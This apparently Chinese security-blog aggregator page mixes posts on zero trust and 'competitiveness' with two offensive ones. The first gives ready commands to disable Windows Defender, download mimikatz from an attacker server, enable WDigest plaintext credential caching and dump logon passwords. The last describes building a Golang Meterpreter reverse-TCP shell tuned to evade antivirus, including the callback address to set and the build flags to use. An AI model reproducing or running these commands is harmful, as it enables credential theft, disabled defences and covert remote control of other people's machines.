Aggregator
Windows Server 2016抓取明文密码
临时禁止Windows Defender
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f gpupdate /force下载mimikatz后解压缩。
powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"修改注册表开启UseLogonCredential
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f等用户下次再登录的时候,可抓到明文密码
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit完成一次渗透测试项目
我也来喷一喷零信任
- 2019年12月26日 11:29
零信任安全架构的核心就是 Never Trust, Always Verify。
说白了就是针对身份实体的请求上下文做一个综合判断,最后给出allow或者deny的结论,可玩的点还是在
Guardicore at RSA: AI-Powered Segmentation, Cloud Native Security
2019 TLS Telemetry Report Summary
关于我
企业安全建设的体系思考与落地实践(二)
RSAC 2020 以色列国家展台的16个标签
浅谈“竞争力”
百度百科是这样解释的:
核心竞争力是指能够为企业带来比较竞争优势的资源,以及资源的配置与整合方式。随着企业资源的变化以及配置与整合效率的提高,企业的核心竞争力也会随之发生变化。凭借着核心竞争力产生的动力,一个企业就有可能在激烈的市场竞争中脱颖而出,使产品和服务的价值在一定时期内得到提升。
维基百科是这样解释的:
竞争力,是对象在竞争中显示的能力。因此它是一种随着竞争变化着的有通过竞争而体现的能力。
竞争力包含在对象的现在,但它是对象未来可以展示的能力。要测定竞争力需要确定一个测定目标时间。
要评价竞争力,需要确定一个比较竞争力的群体,根据目标时间在竞争群体中的表现评价它。测定和评价竞争力可以采用未来研究方法,但竞争力测定的是对象“现在”中包含的“未来”。
抽象以上概念,也就是”竞争力“的基础条件是2个对象,A与B,其中A是固定的值,B的取值范围是:A>B(B无限趋近于正无穷),也就是说A的竞争力比B大。
反推以上概念,如果A要保持核心竞争力。而改变B的取值范围,公式如下:A>B(0<B≤1)的时候,就是A的核心竞争力对于B的竞争力是永恒的。
如果以上概念,晦涩难懂,以下以”财务自由“的概念套入:
严格意义来说:巴菲特是不是财务自由?需要考虑3个主要变量,分别是A,B,t。其中A是当下的收入,B是当下的支出,t是时间。当收入小于支出,随着t的值增大,那么财富就会减小。而t的取值范围则是:第一次初始收入≤t≤生命终止。
那么核心竞争力,同样需要考虑3个主要变量,A,B,s,其中A是固定的对象,B是对比的对象,s是增长速度。而永恒竞争力的公式如下:
A>a(0<a≤1),A是此刻的你,a是上一刻的你。也就是说,今天的你要优于昨天的你。不去对比,只与自己对比,并且永远大于上一刻的你,便是你自己的永恒核心竞争力,当变量S(A)>S(B)[S为增长速度,A为你本身,B为对比对象],便是你永恒竞争力。
How I Avoided a Recruiter Scam
Linux 获取 ROOT 权限后的维持小技巧
Human Element-- 为什么它是RSAC 2020创新沙盒比赛冠军
The Perfect Cybersecurity Applicant is Likely a Veteran
Apache AJP 协议 CVE-2020-1938 漏洞分析
挖矿应急响应小结
JDK7u21反序列化Gadgets - 淚笑
更换博客 - 淚笑
Golang实现的x86下的Meterpreter reverse tcp
Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter
做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。
使用方法修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。
set GOARCH=386 go build -ldflags="-H windowsgui -w"注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。
由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。
免杀效果加入了Bypass AV的代码。
我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。
今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。
在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。